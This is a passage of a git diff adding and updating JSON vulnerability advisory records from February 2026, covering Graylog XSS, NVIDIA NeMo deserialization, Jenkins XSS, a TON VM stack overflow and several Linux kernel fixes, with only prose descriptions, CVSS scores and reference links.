browser and limited manipulation of the affected user's session context, through the '/system/authentication/users/edit/' endpoint.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1437" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-graylog" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5rm9-pcp8-m6v8/GHSA-5rm9-pcp8-m6v8.json b/advisories/unreviewed/2026/02/GHSA-5rm9-pcp8-m6v8/GHSA-5rm9-pcp8-m6v8.json new file mode 100644 index 0000000000000..3a2b3697d87e9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5rm9-pcp8-m6v8/GHSA-5rm9-pcp8-m6v8.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5rm9-pcp8-m6v8", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33240" + ], + "details": "NVIDIA Megatron Bridge contains a vulnerability in a data shuffling tutorial, where malicious input could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33240" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5781" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33240" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6jg9-x4w8-gj7j/GHSA-6jg9-x4w8-gj7j.json b/advisories/unreviewed/2026/02/GHSA-6jg9-x4w8-gj7j/GHSA-6jg9-x4w8-gj7j.json index 0554f3c56725a..08b97d1d07780 100644 --- a/advisories/unreviewed/2026/02/GHSA-6jg9-x4w8-gj7j/GHSA-6jg9-x4w8-gj7j.json +++ b/advisories/unreviewed/2026/02/GHSA-6jg9-x4w8-gj7j/GHSA-6jg9-x4w8-gj7j.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-284" + ], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-6qr6-c44j-c793/GHSA-6qr6-c44j-c793.json b/advisories/unreviewed/2026/02/GHSA-6qr6-c44j-c793/GHSA-6qr6-c44j-c793.json new file mode 100644 index 0000000000000..32324aa90966f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6qr6-c44j-c793/GHSA-6qr6-c44j-c793.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6qr6-c44j-c793", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-2655" + ], + "details": "A vulnerability was detected in ChaiScript up to 6.1.0. The impacted element is the function chaiscript::str_less::operator of the file include/chaiscript/chaiscript_defines.hpp. The manipulation results in use after free. The attack requires a local approach. The attack requires a high level of complexity. The exploitability is regarded as difficult. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2655" + }, + { + "type": "WEB", + "url": "https://github.com/ChaiScript/ChaiScript/issues/632" + }, + { + "type": "WEB", + "url": "https://github.com/ChaiScript/ChaiScript/issues/632#issue-3827824936" + }, + { + "type": "WEB", + "url": "https://github.com/ChaiScript/ChaiScript" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346453" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346453" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752788" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json b/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json index 6e844f0378d15..7b0a56750956f 100644 --- a/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json +++ b/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-288" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-77vx-jc7r-586m/GHSA-77vx-jc7r-586m.json b/advisories/unreviewed/2026/02/GHSA-77vx-jc7r-586m/GHSA-77vx-jc7r-586m.json new file mode 100644 index 0000000000000..a620971e97821 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-77vx-jc7r-586m/GHSA-77vx-jc7r-586m.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-77vx-jc7r-586m", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23219" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/slab: Add alloc_tagging_slab_free_hook for memcg_alloc_abort_single\n\nWhen CONFIG_MEM_ALLOC_PROFILING_DEBUG is enabled, the following warning\nmay be noticed:\n\n[ 3959.023862] ------------[ cut here ]------------\n[ 3959.023891] alloc_tag was not cleared (got tag for lib/xarray.c:378)\n[ 3959.023947] WARNING: ./include/linux/alloc_tag.h:155 at alloc_tag_add+0x128/0x178, CPU#6: mkfs.ntfs/113998\n[ 3959.023978] Modules linked in: dns_resolver tun brd overlay exfat btrfs blake2b libblake2b xor xor_neon raid6_pq loop sctp ip6_udp_tunnel udp_tunnel ext4 crc16 mbcache jbd2 rfkill sunrpc vfat fat sg fuse nfnetlink sr_mod virtio_gpu cdrom drm_client_lib virtio_dma_buf drm_shmem_helper drm_kms_helper ghash_ce drm sm4 backlight virtio_net net_failover virtio_scsi failover virtio_console virtio_blk virtio_mmio dm_mirror dm_region_hash dm_log dm_multipath dm_mod i2c_dev aes_neon_bs aes_ce_blk [last unloaded: hwpoison_inject]\n[ 3959.024170] CPU: 6 UID: 0 PID: 113998 Comm: mkfs.ntfs Kdump: loaded Tainted: G W 6.19.0-rc7+ #7 PREEMPT(voluntary)\n[ 3959.024182] Tainted: [W]=WARN\n[ 3959.024186] Hardware name: QEMU KVM Virtual Machine, BIOS unknown 2/2/2022\n[ 3959.024192] pstate: 604000c5 (nZCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n[ 3959.024199] pc : alloc_tag_add+0x128/0x178\n[ 3959.024207] lr : alloc_tag_add+0x128/0x178\n[ 3959.024214] sp : ffff80008b696d60\n[ 3959.024219] x29: ffff80008b696d60 x28: 0000000000000000 x27: 0000000000000240\n[ 3959.024232] x26: 0000000000000000 x25: 0000000000000240 x24: ffff800085d17860\n[ 3959.024245] x23: 0000000000402800 x22: ffff0000c0012dc0 x21: 00000000000002d0\n[ 3959.024257] x20: ffff0000e6ef3318 x19: ffff800085ae0410 x18: 0000000000000000\n[ 3959.024269] x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000\n[ 3959.024281] x14: 0000000000000000 x13: 0000000000000001 x12: ffff600064101293\n[ 3959.024292] x11: 1fffe00064101292 x10: ffff600064101292 x9 : dfff800000000000\n[ 3959.024305] x8 : 00009fff9befed6e x7 : ffff000320809493 x6 : 0000000000000001\n[ 3959.024316] x5 : ffff000320809490 x4 : ffff600064101293 x3 : ffff800080691838\n[ 3959.024328] x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff0000d5bcd640\n[ 3959.024340] Call trace:\n[ 3959.024346] alloc_tag_add+0x128/0x178 (P)\n[ 3959.024355] __alloc_tagging_slab_alloc_hook+0x11c/0x1a8\n[ 3959.024362] kmem_cache_alloc_lru_noprof+0x1b8/0x5e8\n[ 3959.024369] xas_alloc+0x304/0x4f0\n[ 3959.024381] xas_create+0x1e0/0x4a0\n[ 3959.024388] xas_store+0x68/0xda8\n[ 3959.024395] __filemap_add_folio+0x5b0/0xbd8\n[ 3959.024409] filemap_add_folio+0x16c/0x7e0\n[ 3959.024416] __filemap_get_folio_mpol+0x2dc/0x9e8\n[ 3959.024424] iomap_get_folio+0xfc/0x180\n[ 3959.024435] __iomap_get_folio+0x2f8/0x4b8\n[ 3959.024441] iomap_write_begin+0x198/0xc18\n[ 3959.024448] iomap_write_iter+0x2ec/0x8f8\n[ 3959.024454] iomap_file_buffered_write+0x19c/0x290\n[ 3959.024461] blkdev_write_iter+0x38c/0x978\n[ 3959.024470] vfs_write+0x4d4/0x928\n[ 3959.024482] ksys_write+0xfc/0x1f8\n[ 3959.024489] __arm64_sys_write+0x74/0xb0\n[ 3959.024496] invoke_syscall+0xd4/0x258\n[ 3959.024507] el0_svc_common.constprop.0+0xb4/0x240\n[ 3959.024514] do_el0_svc+0x48/0x68\n[ 3959.024520] el0_svc+0x40/0xf8\n[ 3959.024526] el0t_64_sync_handler+0xa0/0xe8\n[ 3959.024533] el0t_64_sync+0x1ac/0x1b0\n[ 3959.024540] ---[ end trace 0000000000000000 ]---\n\nWhen __memcg_slab_post_alloc_hook() fails, there are two different\nfree paths depending on whether size == 1 or size != 1. In the\nkmem_cache_free_bulk() path, we do call alloc_tagging_slab_free_hook().\nHowever, in memcg_alloc_abort_single() we don't, the above warning will be\ntriggered on the next allocation.\n\nTherefore, add alloc_tagging_slab_free_hook() to the\nmemcg_alloc_abort_single() path.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23219" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b8bc72587c79fe52c14732e16a766b6eded00707" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e6c53ead2d8fa73206e0a63e9cd9aea6bc929837" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e8af57e090790983591f6927b3d89ee6383f8c1e" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-787p-86v4-hhfg/GHSA-787p-86v4-hhfg.json b/advisories/unreviewed/2026/02/GHSA-787p-86v4-hhfg/GHSA-787p-86v4-hhfg.json new file mode 100644 index 0000000000000..521a2d425dac0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-787p-86v4-hhfg/GHSA-787p-86v4-hhfg.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-787p-86v4-hhfg", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23217" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nriscv: trace: fix snapshot deadlock with sbi ecall\n\nIf sbi_ecall.c's functions are traceable,\n\necho \"__sbi_ecall:snapshot\" > /sys/kernel/tracing/set_ftrace_filter\n\nmay get the kernel into a deadlock.\n\n(Functions in sbi_ecall.c are excluded from tracing if\nCONFIG_RISCV_ALTERNATIVE_EARLY is set.)\n\n__sbi_ecall triggers a snapshot of the ringbuffer. The snapshot code\nraises an IPI interrupt, which results in another call to __sbi_ecall\nand another snapshot...\n\nAll it takes to get into this endless loop is one initial __sbi_ecall.\nOn RISC-V systems without SSTC extension, the clock events in\ntimer-riscv.c issue periodic sbi ecalls, making the problem easy to\ntrigger.\n\nAlways exclude the sbi_ecall.c functions from tracing to fix the\npotential deadlock.\n\nsbi ecalls can easiliy be logged via trace events, excluding ecall\nfunctions from function tracing is not a big limitation.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23217" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b0d7f5f0c9f05f1b6d4ee7110f15bef9c11f9df0" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b1f8285bc8e3508c1fde23b5205f1270215d4984" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-78p6-wh6m-9r9w/GHSA-78p6-wh6m-9r9w.json b/advisories/unreviewed/2026/02/GHSA-78p6-wh6m-9r9w/GHSA-78p6-wh6m-9r9w.json new file mode 100644 index 0000000000000..d00d13a95da0a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-78p6-wh6m-9r9w/GHSA-78p6-wh6m-9r9w.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-78p6-wh6m-9r9w", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-60036" + ], + "details": "A vulnerability has been identified in the UA.Testclient utility, which is included in Rexroth IndraWorks. All versions prior to 15V24 are affected. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes the application to deserialize the malicious data, enabling Remote Code Execution (RCE). This can lead to a complete compromise of the system running the UA.Testclient.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60036" + }, + { + "type": "WEB", + "url": "https://psirt.bosch.com/security-advisories/BOSCH-SA-591522.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7jfh-hm8h-m5rq/GHSA-7jfh-hm8h-m5rq.json b/advisories/unreviewed/2026/02/GHSA-7jfh-hm8h-m5rq/GHSA-7jfh-hm8h-m5rq.json index 0e2e6f0b944ba..d9fc222a6c232 100644 --- a/advisories/unreviewed/2026/02/GHSA-7jfh-hm8h-m5rq/GHSA-7jfh-hm8h-m5rq.json +++ b/advisories/unreviewed/2026/02/GHSA-7jfh-hm8h-m5rq/GHSA-7jfh-hm8h-m5rq.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-269" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json b/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json new file mode 100644 index 0000000000000..977856997d094 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-85h6-5m3v-gx37", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-27099" + ], + "details": "Jenkins 2.483 through 2.550 (both inclusive), LTS 2.492.1 through 2.541.1 (both inclusive) does not escape the user-provided description of the \"Mark temporarily offline\" offline cause, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Agent/Configure or Agent/Disconnect permission.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27099" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2026-02-18/#SECURITY-3669" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-87ff-rq35-47jj/GHSA-87ff-rq35-47jj.json b/advisories/unreviewed/2026/02/GHSA-87ff-rq35-47jj/GHSA-87ff-rq35-47jj.json new file mode 100644 index 0000000000000..b8362687aacc6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-87ff-rq35-47jj/GHSA-87ff-rq35-47jj.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-87ff-rq35-47jj", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-7630" + ], + "details": "Improper Restriction of Excessive Authentication Attempts, Improper Authentication vulnerability in Doruk Communication and Automation Industry and Trade Inc. Wispotter allows Password Brute Forcing, Brute Force.This issue affects Wispotter: from 1.0 before v2025.10.08.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7630" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0070" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T13:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json b/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json index c94330561f16b..77e61c9efb6e4 100644 --- a/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json +++ b/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-288" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-933h-c422-j33j/GHSA-933h-c422-j33j.json b/advisories/unreviewed/2026/02/GHSA-933h-c422-j33j/GHSA-933h-c422-j33j.json new file mode 100644 index 0000000000000..aa88979e8a389 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-933h-c422-j33j/GHSA-933h-c422-j33j.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-933h-c422-j33j", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33241" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution by loading a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33241" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33241" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json b/advisories/unreviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json new file mode 100644 index 0000000000000..6ec1cf8e8ebf9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9379-mwvr-7wxx", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33245" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where malicious data could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33245" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33245" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-964f-vc2f-ch6j/GHSA-964f-vc2f-ch6j.json b/advisories/unreviewed/2026/02/GHSA-964f-vc2f-ch6j/GHSA-964f-vc2f-ch6j.json index d6e16c284b1e6..aebddea98a329 100644 --- a/advisories/unreviewed/2026/02/GHSA-964f-vc2f-ch6j/GHSA-964f-vc2f-ch6j.json +++ b/advisories/unreviewed/2026/02/GHSA-964f-vc2f-ch6j/GHSA-964f-vc2f-ch6j.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-964f-vc2f-ch6j", - "modified": "2026-02-14T00:32:42Z", + "modified": "2026-02-18T15:31:24Z", "published": "2026-02-14T00:32:42Z", "aliases": [ "CVE-2025-70955" ], "details": "A Stack Overflow vulnerability was discovered in the TON Virtual Machine (TVM) before v2024.10. The vulnerability stems from the improper handling of vmstate and continuation jump instructions, which allow for continuous dynamic tail calls. An attacker can exploit this by crafting a smart contract with deeply nested jump logic. Even within permissible gas limits, this nested execution exhausts the host process's stack space, causing the validator node to crash. This results in a Denial of Service (DoS) for the TON blockchain network.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-674" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-13T22:16:10Z" diff --git a/advisories/unreviewed/2026/02/GHSA-c5gg-v573-hv7f/GHSA-c5gg-v573-hv7f.json b/advisories/unreviewed/2026/02/GHSA-c5gg-v573-hv7f/GHSA-c5gg-v573-hv7f.json new file mode 100644 index 0000000000000..b00448ac4ffec --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c5gg-v573-hv7f/GHSA-c5gg-v573-hv7f.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c5gg-v573-hv7f", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-71227" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mac80211: don't WARN for connections on invalid channels\n\nIt's not clear (to me) how exactly syzbot managed to hit this,\nbut it seems conceivable that e.g. regulatory changed and has\ndisabled a channel between scanning (channel is checked to be\nusable by cfg80211_get_ies_channel_number) and connecting on\nthe channel later.\n\nWith one scenario that isn't covered elsewhere described above,\nthe warning isn't good, replace it with a (more informative)\nerror message.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71227" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/10d3ff7e5812c8d70300f6fa8f524009a06aa7e1" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/99067b58a408a384d2a45c105eb3dce980a862ce" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json b/advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json new file mode 100644 index 0000000000000..2120594c9543c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cf26-rj67-f4wr", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1441" + ], + "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/system/index_sets/' endpoint.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1441" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-graylog" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json b/advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json new file mode 100644 index 0000000000000..4721f7998d570 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cw7v-qx8m-563q", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1438" + ], + "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/system/nodes/' endpoint.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1438" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-graylog" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:06Z" + } +} \ No newline at end of file diff --git 